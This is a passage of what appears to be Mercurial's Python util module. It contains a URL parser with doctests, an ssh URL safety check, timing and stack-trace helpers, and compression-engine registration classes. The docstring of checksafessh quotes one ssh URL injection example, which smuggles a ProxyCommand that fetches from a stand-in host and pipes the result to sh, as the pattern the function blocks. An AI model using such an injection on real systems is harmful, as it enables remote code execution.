2710 2714 signal.signal(signal.SIGCHLD, prevhandler)
2711 2715
2712 2716 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2713 2717 """Return the result of interpolating items in the mapping into string s.
2714 2718
2715 2719 prefix is a single character string, or a two character string with
2716 2720 a backslash as the first character if the prefix needs to be escaped in
2717 2721 a regular expression.
2718 2722
2719 2723 fn is an optional function that will be applied to the replacement text
2720 2724 just before replacement.
2721 2725
2722 2726 escape_prefix is an optional flag that allows using doubled prefix for
2723 2727 its escaping.
2724 2728 """
2725 2729 fn = fn or (lambda s: s)
2726 2730 patterns = '|'.join(mapping.keys())
2727 2731 if escape_prefix:
2728 2732 patterns += '|' + prefix
2729 2733 if len(prefix) > 1:
2730 2734 prefix_char = prefix[1:]
2731 2735 else:
2732 2736 prefix_char = prefix
2733 2737 mapping[prefix_char] = prefix_char
2734 2738 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2735 2739 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2736 2740
2737 2741 def getport(port):
2738 2742 """Return the port for a given network service.
2739 2743
2740 2744 If port is an integer, it's returned as is. If it's a string, it's
2741 2745 looked up using socket.getservbyname(). If there's no matching
2742 2746 service, error.Abort is raised.
2743 2747 """
2744 2748 try:
2745 2749 return int(port)
2746 2750 except ValueError:
2747 2751 pass
2748 2752
2749 2753 try:
2750 2754 return socket.getservbyname(pycompat.sysstr(port))
2751 2755 except socket.error:
2752 2756 raise Abort(_("no port number associated with service '%s'") % port)
2753 2757
2754 2758 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2755 2759 '0': False, 'no': False, 'false': False, 'off': False,
2756 2760 'never': False}
2757 2761
2758 2762 def parsebool(s):
2759 2763 """Parse s into a boolean.
2760 2764
2761 2765 If s is not a valid boolean, returns None.
2762 2766 """
2763 2767 return _booleans.get(s.lower(), None)
2764 2768
2765 2769 _hextochr = dict((a + b, chr(int(a + b, 16)))
2766 2770 for a in string.hexdigits for b in string.hexdigits)
2767 2771
2768 2772 class url(object):
2769 2773 r"""Reliable URL parser.
2770 2774
2771 2775 This parses URLs and provides attributes for the following
2772 2776 components:
2773 2777
2774 2778 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2775 2779
2776 2780 Missing components are set to None. The only exception is
2777 2781 fragment, which is set to '' if present but empty.
2778 2782
2779 2783 If parsefragment is False, fragment is included in query. If
2780 2784 parsequery is False, query is included in path. If both are
2781 2785 False, both fragment and query are included in path.
2782 2786
2783 2787 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2784 2788
2785 2789 Note that for backward compatibility reasons, bundle URLs do not
2786 2790 take host names. That means 'bundle://../' has a path of '../'.
2787 2791
2788 2792 Examples:
2789 2793
2790 2794 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2791 2795 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2792 2796 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2793 2797 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2794 2798 >>> url(b'file:///home/joe/repo')
2795 2799 <url scheme: 'file', path: '/home/joe/repo'>
2796 2800 >>> url(b'file:///c:/temp/foo/')
2797 2801 <url scheme: 'file', path: 'c:/temp/foo/'>
2798 2802 >>> url(b'bundle:foo')
2799 2803 <url scheme: 'bundle', path: 'foo'>
2800 2804 >>> url(b'bundle://../foo')
2801 2805 <url scheme: 'bundle', path: '../foo'>
2802 2806 >>> url(br'c:\foo\bar')
2803 2807 <url path: 'c:\\foo\\bar'>
2804 2808 >>> url(br'\\blah\blah\blah')
2805 2809 <url path: '\\\\blah\\blah\\blah'>
2806 2810 >>> url(br'\\blah\blah\blah#baz')
2807 2811 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2808 2812 >>> url(br'file:///C:\users\me')
2809 2813 <url scheme: 'file', path: 'C:\\users\\me'>
2810 2814
2811 2815 Authentication credentials:
2812 2816
2813 2817 >>> url(b'ssh://joe:xyz@x/repo')
2814 2818 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2815 2819 >>> url(b'ssh://joe@x/repo')
2816 2820 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2817 2821
2818 2822 Query strings and fragments:
2819 2823
2820 2824 >>> url(b'http://host/a?b#c')
2821 2825 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2822 2826 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2823 2827 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2824 2828
2825 2829 Empty path:
2826 2830
2827 2831 >>> url(b'')
2828 2832 <url path: ''>
2829 2833 >>> url(b'#a')
2830 2834 <url path: '', fragment: 'a'>
2831 2835 >>> url(b'http://host/')
2832 2836 <url scheme: 'http', host: 'host', path: ''>
2833 2837 >>> url(b'http://host/#a')
2834 2838 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2835 2839
2836 2840 Only scheme:
2837 2841
2838 2842 >>> url(b'http:')
2839 2843 <url scheme: 'http'>
2840 2844 """
2841 2845
2842 2846 _safechars = "!~*'()+"
2843 2847 _safepchars = "/!~*'()+:\\"
2844 2848 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2845 2849
2846 2850 def __init__(self, path, parsequery=True, parsefragment=True):
2847 2851 # We slowly chomp away at path until we have only the path left
2848 2852 self.scheme = self.user = self.passwd = self.host = None
2849 2853 self.port = self.path = self.query = self.fragment = None
2850 2854 self._localpath = True
2851 2855 self._hostport = ''
2852 2856 self._origpath = path
2853 2857
2854 2858 if parsefragment and '#' in path:
2855 2859 path, self.fragment = path.split('#', 1)
2856 2860
2857 2861 # special case for Windows drive letters and UNC paths
2858 2862 if hasdriveletter(path) or path.startswith('\\\\'):
2859 2863 self.path = path
2860 2864 return
2861 2865
2862 2866 # For compatibility reasons, we can't handle bundle paths as
2863 2867 # normal URLS
2864 2868 if path.startswith('bundle:'):
2865 2869 self.scheme = 'bundle'
2866 2870 path = path[7:]
2867 2871 if path.startswith('//'):
2868 2872 path = path[2:]
2869 2873 self.path = path
2870 2874 return
2871 2875
2872 2876 if self._matchscheme(path):
2873 2877 parts = path.split(':', 1)
2874 2878 if parts[0]:
2875 2879 self.scheme, path = parts
2876 2880 self._localpath = False
2877 2881
2878 2882 if not path:
2879 2883 path = None
2880 2884 if self._localpath:
2881 2885 self.path = ''
2882 2886 return
2883 2887 else:
2884 2888 if self._localpath:
2885 2889 self.path = path
2886 2890 return
2887 2891
2888 2892 if parsequery and '?' in path:
2889 2893 path, self.query = path.split('?', 1)
2890 2894 if not path:
2891 2895 path = None
2892 2896 if not self.query:
2893 2897 self.query = None
2894 2898
2895 2899 # // is required to specify a host/authority
2896 2900 if path and path.startswith('//'):
2897 2901 parts = path[2:].split('/', 1)
2898 2902 if len(parts) > 1:
2899 2903 self.host, path = parts
2900 2904 else:
2901 2905 self.host = parts[0]
2902 2906 path = None
2903 2907 if not self.host:
2904 2908 self.host = None
2905 2909 # path of file:///d is /d
2906 2910 # path of file:///d:/ is d:/, not /d:/
2907 2911 if path and not hasdriveletter(path):
2908 2912 path = '/' + path
2909 2913
2910 2914 if self.host and '@' in self.host:
2911 2915 self.user, self.host = self.host.rsplit('@', 1)
2912 2916 if ':' in self.user:
2913 2917 self.user, self.passwd = self.user.split(':', 1)
2914 2918 if not self.host:
2915 2919 self.host = None
2916 2920
2917 2921 # Don't split on colons in IPv6 addresses without ports
2918 2922 if (self.host and ':' in self.host and
2919 2923 not (self.host.startswith('[') and self.host.endswith(']'))):
2920 2924 self._hostport = self.host
2921 2925 self.host, self.port = self.host.rsplit(':', 1)
2922 2926 if not self.host:
2923 2927 self.host = None
2924 2928
2925 2929 if (self.host and self.scheme == 'file' and
2926 2930 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2927 2931 raise Abort(_('file:// URLs can only refer to localhost'))
2928 2932
2929 2933 self.path = path
2930 2934
2931 2935 # leave the query string escaped
2932 2936 for a in ('user', 'passwd', 'host', 'port',
2933 2937 'path', 'fragment'):
2934 2938 v = getattr(self, a)
2935 2939 if v is not None:
2936 2940 setattr(self, a, urlreq.unquote(v))
2937 2941
2938 2942 @encoding.strmethod
2939 2943 def __repr__(self):
2940 2944 attrs = []
2941 2945 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2942 2946 'query', 'fragment'):
2943 2947 v = getattr(self, a)
2944 2948 if v is not None:
2945 2949 attrs.append('%s: %r' % (a, v))
2946 2950 return '<url %s>' % ', '.join(attrs)
2947 2951
2948 2952 def __bytes__(self):
2949 2953 r"""Join the URL's components back into a URL string.
2950 2954
2951 2955 Examples:
2952 2956
2953 2957 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2954 2958 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2955 2959 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2956 2960 'http://user:pw@host:80/?foo=bar&baz=42'
2957 2961 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2958 2962 'http://user:pw@host:80/?foo=bar%3dbaz'
2959 2963 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2960 2964 'ssh://user:pw@[::1]:2200//home/joe#'
2961 2965 >>> bytes(url(b'http://localhost:80//'))
2962 2966 'http://localhost:80//'
2963 2967 >>> bytes(url(b'http://localhost:80/'))
2964 2968 'http://localhost:80/'
2965 2969 >>> bytes(url(b'http://localhost:80'))
2966 2970 'http://localhost:80/'
2967 2971 >>> bytes(url(b'bundle:foo'))
2968 2972 'bundle:foo'
2969 2973 >>> bytes(url(b'bundle://../foo'))
2970 2974 'bundle:../foo'
2971 2975 >>> bytes(url(b'path'))
2972 2976 'path'
2973 2977 >>> bytes(url(b'file:///tmp/foo/bar'))
2974 2978 'file:///tmp/foo/bar'
2975 2979 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2976 2980 'file:///c:/tmp/foo/bar'
2977 2981 >>> print(url(br'bundle:foo\bar'))
2978 2982 bundle:foo\bar
2979 2983 >>> print(url(br'file:///D:\data\hg'))
2980 2984 file:///D:\data\hg
2981 2985 """
2982 2986 if self._localpath:
2983 2987 s = self.path
2984 2988 if self.scheme == 'bundle':
2985 2989 s = 'bundle:' + s
2986 2990 if self.fragment:
2987 2991 s += '#' + self.fragment
2988 2992 return s
2989 2993
2990 2994 s = self.scheme + ':'
2991 2995 if self.user or self.passwd or self.host:
2992 2996 s += '//'
2993 2997 elif self.scheme and (not self.path or self.path.startswith('/')
2994 2998 or hasdriveletter(self.path)):
2995 2999 s += '//'
2996 3000 if hasdriveletter(self.path):
2997 3001 s += '/'
2998 3002 if self.user:
2999 3003 s += urlreq.quote(self.user, safe=self._safechars)
3000 3004 if self.passwd:
3001 3005 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3002 3006 if self.user or self.passwd:
3003 3007 s += '@'
3004 3008 if self.host:
3005 3009 if not (self.host.startswith('[') and self.host.endswith(']')):
3006 3010 s += urlreq.quote(self.host)
3007 3011 else:
3008 3012 s += self.host
3009 3013 if self.port:
3010 3014 s += ':' + urlreq.quote(self.port)
3011 3015 if self.host:
3012 3016 s += '/'
3013 3017 if self.path:
3014 3018 # TODO: similar to the query string, we should not unescape the
3015 3019 # path when we store it, the path might contain '%2f' = '/',
3016 3020 # which we should *not* escape.
3017 3021 s += urlreq.quote(self.path, safe=self._safepchars)
3018 3022 if self.query:
3019 3023 # we store the query in escaped form.
3020 3024 s += '?' + self.query
3021 3025 if self.fragment is not None:
3022 3026 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3023 3027 return s
3024 3028
3025 3029 __str__ = encoding.strmethod(__bytes__)
3026 3030
3027 3031 def authinfo(self):
3028 3032 user, passwd = self.user, self.passwd
3029 3033 try:
3030 3034 self.user, self.passwd = None, None
3031 3035 s = bytes(self)
3032 3036 finally:
3033 3037 self.user, self.passwd = user, passwd
3034 3038 if not self.user:
3035 3039 return (s, None)
3036 3040 # authinfo[1] is passed to urllib2 password manager, and its
3037 3041 # URIs must not contain credentials. The host is passed in the
3038 3042 # URIs list because Python < 2.4.3 uses only that to search for
3039 3043 # a password.
3040 3044 return (s, (None, (s, self.host),
3041 3045 self.user, self.passwd or ''))
3042 3046
3043 3047 def isabs(self):
3044 3048 if self.scheme and self.scheme != 'file':
3045 3049 return True # remote URL
3046 3050 if hasdriveletter(self.path):
3047 3051 return True # absolute for our purposes - can't be joined()
3048 3052 if self.path.startswith(br'\\'):
3049 3053 return True # Windows UNC path
3050 3054 if self.path.startswith('/'):
3051 3055 return True # POSIX-style
3052 3056 return False
3053 3057
3054 3058 def localpath(self):
3055 3059 if self.scheme == 'file' or self.scheme == 'bundle':
3056 3060 path = self.path or '/'
3057 3061 # For Windows, we need to promote hosts containing drive
3058 3062 # letters to paths with drive letters.
3059 3063 if hasdriveletter(self._hostport):
3060 3064 path = self._hostport + '/' + self.path
3061 3065 elif (self.host is not None and self.path
3062 3066 and not hasdriveletter(path)):
3063 3067 path = '/' + path
3064 3068 return path
3065 3069 return self._origpath
3066 3070
3067 3071 def islocal(self):
3068 3072 '''whether localpath will return something that posixfile can open'''
3069 3073 return (not self.scheme or self.scheme == 'file'
3070 3074 or self.scheme == 'bundle')
3071 3075
3072 3076 def hasscheme(path):
3073 3077 return bool(url(path).scheme)
3074 3078
3075 3079 def hasdriveletter(path):
3076 3080 return path and path[1:2] == ':' and path[0:1].isalpha()
3077 3081
3078 3082 def urllocalpath(path):
3079 3083 return url(path, parsequery=False, parsefragment=False).localpath()
3080 3084
3081 3085 def checksafessh(path):
3082 3086 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3083 3087
3084 3088 This is a sanity check for ssh urls. ssh will parse the first item as
3085 3089 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3086 3090 Let's prevent these potentially exploited urls entirely and warn the
3087 3091 user.
3088 3092
3089 3093 Raises an error.Abort when the url is unsafe.
3090 3094 """
3091 3095 path = urlreq.unquote(path)
3092 3096 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3093 3097 raise error.Abort(_('potentially unsafe url: %r') %
3094 3098 (path,))
3095 3099
3096 3100 def hidepassword(u):
3097 3101 '''hide user credential in a url string'''
3098 3102 u = url(u)
3099 3103 if u.passwd:
3100 3104 u.passwd = '***'
3101 3105 return bytes(u)
3102 3106
3103 3107 def removeauth(u):
3104 3108 '''remove all authentication information from a url string'''
3105 3109 u = url(u)
3106 3110 u.user = u.passwd = None
3107 3111 return str(u)
3108 3112
3109 3113 timecount = unitcountfn(
3110 3114 (1, 1e3, _('%.0f s')),
3111 3115 (100, 1, _('%.1f s')),
3112 3116 (10, 1, _('%.2f s')),
3113 3117 (1, 1, _('%.3f s')),
3114 3118 (100, 0.001, _('%.1f ms')),
3115 3119 (10, 0.001, _('%.2f ms')),
3116 3120 (1, 0.001, _('%.3f ms')),
3117 3121 (100, 0.000001, _('%.1f us')),
3118 3122 (10, 0.000001, _('%.2f us')),
3119 3123 (1, 0.000001, _('%.3f us')),
3120 3124 (100, 0.000000001, _('%.1f ns')),
3121 3125 (10, 0.000000001, _('%.2f ns')),
3122 3126 (1, 0.000000001, _('%.3f ns')),
3123 3127 )
3124 3128
3125 3129 _timenesting = [0]
3126 3130
3127 3131 def timed(func):
3128 3132 '''Report the execution time of a function call to stderr.
3129 3133
3130 3134 During development, use as a decorator when you need to measure
3131 3135 the cost of a function, e.g. as follows:
3132 3136
3133 3137 @util.timed
3134 3138 def foo(a, b, c):
3135 3139 pass
3136 3140 '''
3137 3141
3138 3142 def wrapper(*args, **kwargs):
3139 3143 start = timer()
3140 3144 indent = 2
3141 3145 _timenesting[0] += indent
3142 3146 try:
3143 3147 return func(*args, **kwargs)
3144 3148 finally:
3145 3149 elapsed = timer() - start
3146 3150 _timenesting[0] -= indent
3147 3151 stderr.write('%s%s: %s\n' %
3148 3152 (' ' * _timenesting[0], func.__name__,
3149 3153 timecount(elapsed)))
3150 3154 return wrapper
3151 3155
3152 3156 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3153 3157 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3154 3158
3155 3159 def sizetoint(s):
3156 3160 '''Convert a space specifier to a byte count.
3157 3161
3158 3162 >>> sizetoint(b'30')
3159 3163 30
3160 3164 >>> sizetoint(b'2.2kb')
3161 3165 2252
3162 3166 >>> sizetoint(b'6M')
3163 3167 6291456
3164 3168 '''
3165 3169 t = s.strip().lower()
3166 3170 try:
3167 3171 for k, u in _sizeunits:
3168 3172 if t.endswith(k):
3169 3173 return int(float(t[:-len(k)]) * u)
3170 3174 return int(t)
3171 3175 except ValueError:
3172 3176 raise error.ParseError(_("couldn't parse size: %s") % s)
3173 3177
3174 3178 class hooks(object):
3175 3179 '''A collection of hook functions that can be used to extend a
3176 3180 function's behavior. Hooks are called in lexicographic order,
3177 3181 based on the names of their sources.'''
3178 3182
3179 3183 def __init__(self):
3180 3184 self._hooks = []
3181 3185
3182 3186 def add(self, source, hook):
3183 3187 self._hooks.append((source, hook))
3184 3188
3185 3189 def __call__(self, *args):
3186 3190 self._hooks.sort(key=lambda x: x[0])
3187 3191 results = []
3188 3192 for source, hook in self._hooks:
3189 3193 results.append(hook(*args))
3190 3194 return results
3191 3195
3192 3196 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3193 3197 '''Yields lines for a nicely formatted stacktrace.
3194 3198 Skips the 'skip' last entries, then return the last 'depth' entries.
3195 3199 Each file+linenumber is formatted according to fileline.
3196 3200 Each line is formatted according to line.
3197 3201 If line is None, it yields:
3198 3202 length of longest filepath+line number,
3199 3203 filepath+linenumber,
3200 3204 function
3201 3205
3202 3206 Not be used in production code but very convenient while developing.
3203 3207 '''
3204 3208 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3205 3209 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3206 3210 ][-depth:]
3207 3211 if entries:
3208 3212 fnmax = max(len(entry[0]) for entry in entries)
3209 3213 for fnln, func in entries:
3210 3214 if line is None:
3211 3215 yield (fnmax, fnln, func)
3212 3216 else:
3213 3217 yield line % (fnmax, fnln, func)
3214 3218
3215 3219 def debugstacktrace(msg='stacktrace', skip=0,
3216 3220 f=stderr, otherf=stdout, depth=0):
3217 3221 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3218 3222 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3219 3223 By default it will flush stdout first.
3220 3224 It can be used everywhere and intentionally does not require an ui object.
3221 3225 Not be used in production code but very convenient while developing.
3222 3226 '''
3223 3227 if otherf:
3224 3228 otherf.flush()
3225 3229 f.write('%s at:\n' % msg.rstrip())
3226 3230 for line in getstackframes(skip + 1, depth=depth):
3227 3231 f.write(line)
3228 3232 f.flush()
3229 3233
3230 3234 class dirs(object):
3231 3235 '''a multiset of directory names from a dirstate or manifest'''
3232 3236
3233 3237 def __init__(self, map, skip=None):
3234 3238 self._dirs = {}
3235 3239 addpath = self.addpath
3236 3240 if safehasattr(map, 'iteritems') and skip is not None:
3237 3241 for f, s in map.iteritems():
3238 3242 if s[0] != skip:
3239 3243 addpath(f)
3240 3244 else:
3241 3245 for f in map:
3242 3246 addpath(f)
3243 3247
3244 3248 def addpath(self, path):
3245 3249 dirs = self._dirs
3246 3250 for base in finddirs(path):
3247 3251 if base in dirs:
3248 3252 dirs[base] += 1
3249 3253 return
3250 3254 dirs[base] = 1
3251 3255
3252 3256 def delpath(self, path):
3253 3257 dirs = self._dirs
3254 3258 for base in finddirs(path):
3255 3259 if dirs[base] > 1:
3256 3260 dirs[base] -= 1
3257 3261 return
3258 3262 del dirs[base]
3259 3263
3260 3264 def __iter__(self):
3261 3265 return iter(self._dirs)
3262 3266
3263 3267 def __contains__(self, d):
3264 3268 return d in self._dirs
3265 3269
3266 3270 if safehasattr(parsers, 'dirs'):
3267 3271 dirs = parsers.dirs
3268 3272
3269 3273 def finddirs(path):
3270 3274 pos = path.rfind('/')
3271 3275 while pos != -1:
3272 3276 yield path[:pos]
3273 3277 pos = path.rfind('/', 0, pos)
3274 3278
3275 3279 # compression code
3276 3280
3277 3281 SERVERROLE = 'server'
3278 3282 CLIENTROLE = 'client'
3279 3283
3280 3284 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3281 3285 (u'name', u'serverpriority',
3282 3286 u'clientpriority'))
3283 3287
3284 3288 class compressormanager(object):
3285 3289 """Holds registrations of various compression engines.
3286 3290
3287 3291 This class essentially abstracts the differences between compression
3288 3292 engines to allow new compression formats to be added easily, possibly from
3289 3293 extensions.
3290 3294
3291 3295 Compressors are registered against the global instance by calling its
3292 3296 ``register()`` method.
3293 3297 """
3294 3298 def __init__(self):
3295 3299 self._engines = {}
3296 3300 # Bundle spec human name to engine name.
3297 3301 self._bundlenames = {}
3298 3302 # Internal bundle identifier to engine name.
3299 3303 self._bundletypes = {}
3300 3304 # Revlog header to engine name.
3301 3305 self._revlogheaders = {}
3302 3306 # Wire proto identifier to engine name.
3303 3307 self._wiretypes = {}
3304 3308
3305 3309 def __getitem__(self, key):
3306 3310 return self._engines[key]
3307 3311
3308 3312 def __contains__(self, key):
3309 3313 return key in self._engines
3310 3314
3311 3315 def __iter__(self):
3312 3316 return iter(self._engines.keys())
3313 3317
3314 3318 def register(self, engine):
3315 3319 """Register a compression engine with the manager.
3316 3320
3317 3321 The argument must be a ``compressionengine`` instance.
3318 3322 """
3319 3323 if not isinstance(engine, compressionengine):
3320 3324 raise ValueError(_('argument must be a compressionengine'))
3321 3325
3322 3326 name = engine.name()
3323 3327
3324 3328 if name in self._engines:
3325 3329 raise error.Abort(_('compression engine %s already registered') %
3326 3330 name)
3327 3331
3328 3332 bundleinfo = engine.bundletype()
3329 3333 if bundleinfo:
3330 3334 bundlename, bundletype = bundleinfo
3331 3335
3332 3336 if bundlename in self._bundlenames:
3333 3337 raise error.Abort(_('bundle name %s already registered') %
3334 3338 bundlename)
3335 3339 if bundletype in self._bundletypes:
3336 3340 raise error.Abort(_('bundle type %s already registered by %s') %
3337 3341 (bundletype, self._bundletypes[bundletype]))
3338 3342
3339 3343 # No external facing name declared.
3340 3344 if bundlename:
3341 3345 self._bundlenames[bundlename] = name
3342 3346
3343 3347 self._bundletypes[bundletype] = name
3344 3348
3345 3349 wiresupport = engine.wireprotosupport()
3346 3350 if wiresupport:
3347 3351 wiretype = wiresupport.name
3348 3352 if wiretype in self._wiretypes:
3349 3353 raise error.Abort(_('wire protocol compression %s already '
3350 3354 'registered by %s') %
3351 3355 (wiretype, self._wiretypes[wiretype]))
3352 3356
3353 3357 self._wiretypes[wiretype] = name
3354 3358
3355 3359 revlogheader = engine.revlogheader()
3356 3360 if revlogheader and revlogheader in self._revlogheaders:
3357 3361 raise error.Abort(_('revlog header %s already registered by %s') %
3358 3362 (revlogheader, self._revlogheaders[revlogheader]))
3359 3363
3360 3364 if revlogheader:
3361 3365 self._revlogheaders[revlogheader] = name
3362 3366
3363 3367 self._engines[name] = engine
3364 3368
3365 3369 @property
3366 3370 def supportedbundlenames(self):
3367 3371 return set(self._bundlenames.keys())
3368 3372
3369 3373 @property
3370 3374 def supportedbundletypes(self):
3371 3375 return set(self._bundletypes.keys())
3372 3376
3373 3377 def forbundlename(self, bundlename):
3374 3378 """Obtain a compression engine registered to a bundle name.
3375 3379
3376 3380 Will raise KeyError if the bundle type isn't registered.
3377 3381
3378 3382 Will abort if the engine is known but not available.
3379 3383 """
3380 3384 engine = self._engines[self._bundlenames[bundlename]]
3381 3385 if not engine.available():
3382 3386 raise error.Abort(_('compression engine %s could not be loaded') %
3383 3387 engine.name())
3384 3388 return engine
3385 3389
3386 3390 def forbundletype(self, bundletype):
3387 3391 """Obtain a compression engine registered to a bundle type.
3388 3392
3389 3393 Will raise KeyError if the bundle type isn't registered.
3390 3394
3391 3395 Will abort if the engine is known but not available.
3392 3396 """
3393 3397 engine = self._engines[self._bundletypes[bundletype]]
3394 3398 if not engine.available():
3395 3399 raise error.Abort(_('compression engine %s could not be loaded') %
3396 3400 engine.name())
3397 3401 return engine
3398 3402
3399 3403 def supportedwireengines(self, role, onlyavailable=True):
3400 3404 """Obtain compression engines that support the wire protocol.
3401 3405
3402 3406 Returns a list of engines in prioritized order, most desired first.
3403 3407
3404 3408 If ``onlyavailable`` is set, filter out engines that can't be
3405 3409 loaded.
3406 3410 """
3407 3411 assert role in (SERVERROLE, CLIENTROLE)
3408 3412
3409 3413 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3410 3414
3411 3415 engines = [self._engines[e] for e in self._wiretypes.values()]
3412 3416 if onlyavailable:
3413 3417 engines = [e for e in engines if e.available()]
3414 3418
3415 3419 def getkey(e):
3416 3420 # Sort first by priority, highest first. In case of tie, sort
3417 3421 # alphabetically. This is arbitrary, but ensures output is
3418 3422 # stable.
3419 3423 w = e.wireprotosupport()
3420 3424 return -1 * getattr(w, attr), w.name
3421 3425
3422 3426 return list(sorted(engines, key=getkey))
3423 3427
3424 3428 def forwiretype(self, wiretype):
3425 3429 engine = self._engines[self._wiretypes[wiretype]]
3426 3430 if not engine.available():
3427 3431 raise error.Abort(_('compression engine %s could not be loaded') %
3428 3432 engine.name())
3429 3433 return engine
3430 3434
3431 3435 def forrevlogheader(self, header):
3432 3436 """Obtain a compression engine registered to a revlog header.
3433 3437
3434 3438 Will raise KeyError if the revlog header value isn't registered.
3435 3439 """
3436 3440 return self._engines[self._revlogheaders[header]]
3437 3441
3438 3442 compengines = compressormanager()
3439 3443
3440 3444 class compressionengine(object):
3441 3445 """Base class for compression engines.
3442 3446
3443 3447 Compression engines must implement the interface defined by this class.
3444 3448 """
3445 3449 def name(self):
3446 3450 """Returns the name of the compression engine.
3447 3451
3448 3452 This is the key the engine is registered under.
3449 3453
3450 3454 This method must be implemented.
3451 3455 """
3452 3456 raise NotImplementedError()
3453 3457
3454 3458 def available(self):
3455 3459 """Whether the compression engine is available.
3456 3460
3457 3461 The intent of this method is to allow optional compression engines
3458 3462 that may not be available in all installations (such as engines relying
3459 3463 on C extensions that may not be present).
3460 3464 """
3461 3465 return True
3462 3466
3463 3467 def bundletype(self):
3464 3468 """Describes bundle identifiers for this engine.
3465 3469
3466 3470 If this compression engine isn't supported for bundles, returns None.
3467 3471
3468 3472 If this engine can be used for bundles, returns a 2-tuple of strings of
3469 3473 the user-facing "bundle spec" compression name and an internal
3470 3474 identifier used to denote the compression format within bundles. To
3471 3475 exclude the name from external usage, set the first element to ``None``.
3472 3476
3473 3477 If bundle compression is supported, the class must also implement
3474 3478 ``compressstream`` and `decompressorreader``.
3475 3479
3476 3480 The docstring of this method is used in the help system to tell users
3477 3481 about this engine.
3478 3482 """
3479 3483 return None
3480 3484
3481 3485 def wireprotosupport(self):
3482 3486 """Declare support for this compression format on the wire protocol.
3483 3487
3484 3488 If this compression engine isn't supported for compressing wire
3485 3489 protocol payloads, returns None.
3486 3490
3487 3491 Otherwise, returns ``compenginewireprotosupport`` with the following
3488 3492 fields:
3489 3493
3490 3494 * String format identifier
3491 3495 * Integer priority for the server
3492 3496 * Integer priority for the client
3493 3497
3494 3498 The integer priorities are used to order the advertisement of format
3495 3499 support by server and client. The highest integer is advertised
3496 3500 first. Integers with non-positive values aren't advertised.
3497 3501
3498 3502 The priority values are somewhat arbitrary and only used for default
3499 3503 ordering. The relative order can be changed via config options.
3500 3504
3501 3505 If wire protocol compression is supported, the class must also implement
3502 3506 ``compressstream`` and ``decompressorreader``.
3503 3507 """
3504 3508 return None
3505 3509
3506 3510 def revlogheader(self):
3507 3511 """Header added to revlog chunks that identifies this engine.
3508 3512
3509 3513 If this engine can be used to compress revlogs, this method should
3510 3514 return the bytes used to identify chunks compressed with this engine.
3511 3515 Else, the method should return ``None`` to indicate it does not
3512 3516 participate in revlog compression.
3513 3517 """
3514 3518 return None
3515 3519
3516 3520 def compressstream(self, it, opts=None):
3517 3521 """Compress an iterator of chunks.
3518 3522
3519 3523 The method receives an iterator (ideally a generator) of chunks of
3520 3524 bytes to be compressed. It returns an iterator (ideally a generator)
3521 3525 of bytes of chunks representing the compressed output.
3522 3526
3523 3527 Optionally accepts an argument defining how to perform compression.
3524 3528 Each engine treats this argument differently.
3525 3529 """
3526 3530 raise NotImplementedError()
3527 3531
3528 3532 def decompressorreader(self, fh):
3529 3533 """Perform decompression on a file object.
3530 3534
3531 3535 Argument is an object with a ``read(size)`` method that returns
3532 3536 compressed data. Return value is an object with a ``read(size)`` that
3533 3537 returns uncompressed data.
3534 3538 """
3535 3539 raise NotImplementedError()
3536 3540
3537 3541 def revlogcompressor(self, opts=None):
3538 3542 """Obtain an object that can be used to compress revlog entries.
3539 3543
3540 3544 The object has a ``compress(data)`` method that compresses binary
3541 3545 data. This method returns compressed binary data or ``None`` if
3542 3546 the data could not be compressed (too small, not compressible, etc).
3543 3547 The returned data should have a header uniquely identifying this
3544 3548 compression format so decompression can be routed to this engine.
3545 3549 This header should be identified by the ``revlogheader()`` return
3546 3550 value.
3547 3551
3548 3552 The object has a ``decompress(data)`` method that decompresses
3549 3553 data. The method will only be called if ``data`` begins with
3550 3554 ``revlogheader()``. The method should return the raw, uncompressed
3551 3555 data or raise a ``RevlogError``.
3552 3556
3553 3557 The object is reusable but is not thread safe.
3554 3558 """
3555 3559 raise NotImplementedError()
3556 3560
3557 3561 class _zlibengine(compressionengine):
3558 3562 def name(self):
3559 3563 return 'zlib'
3560 3564
3561 3565 def bundletype(self):
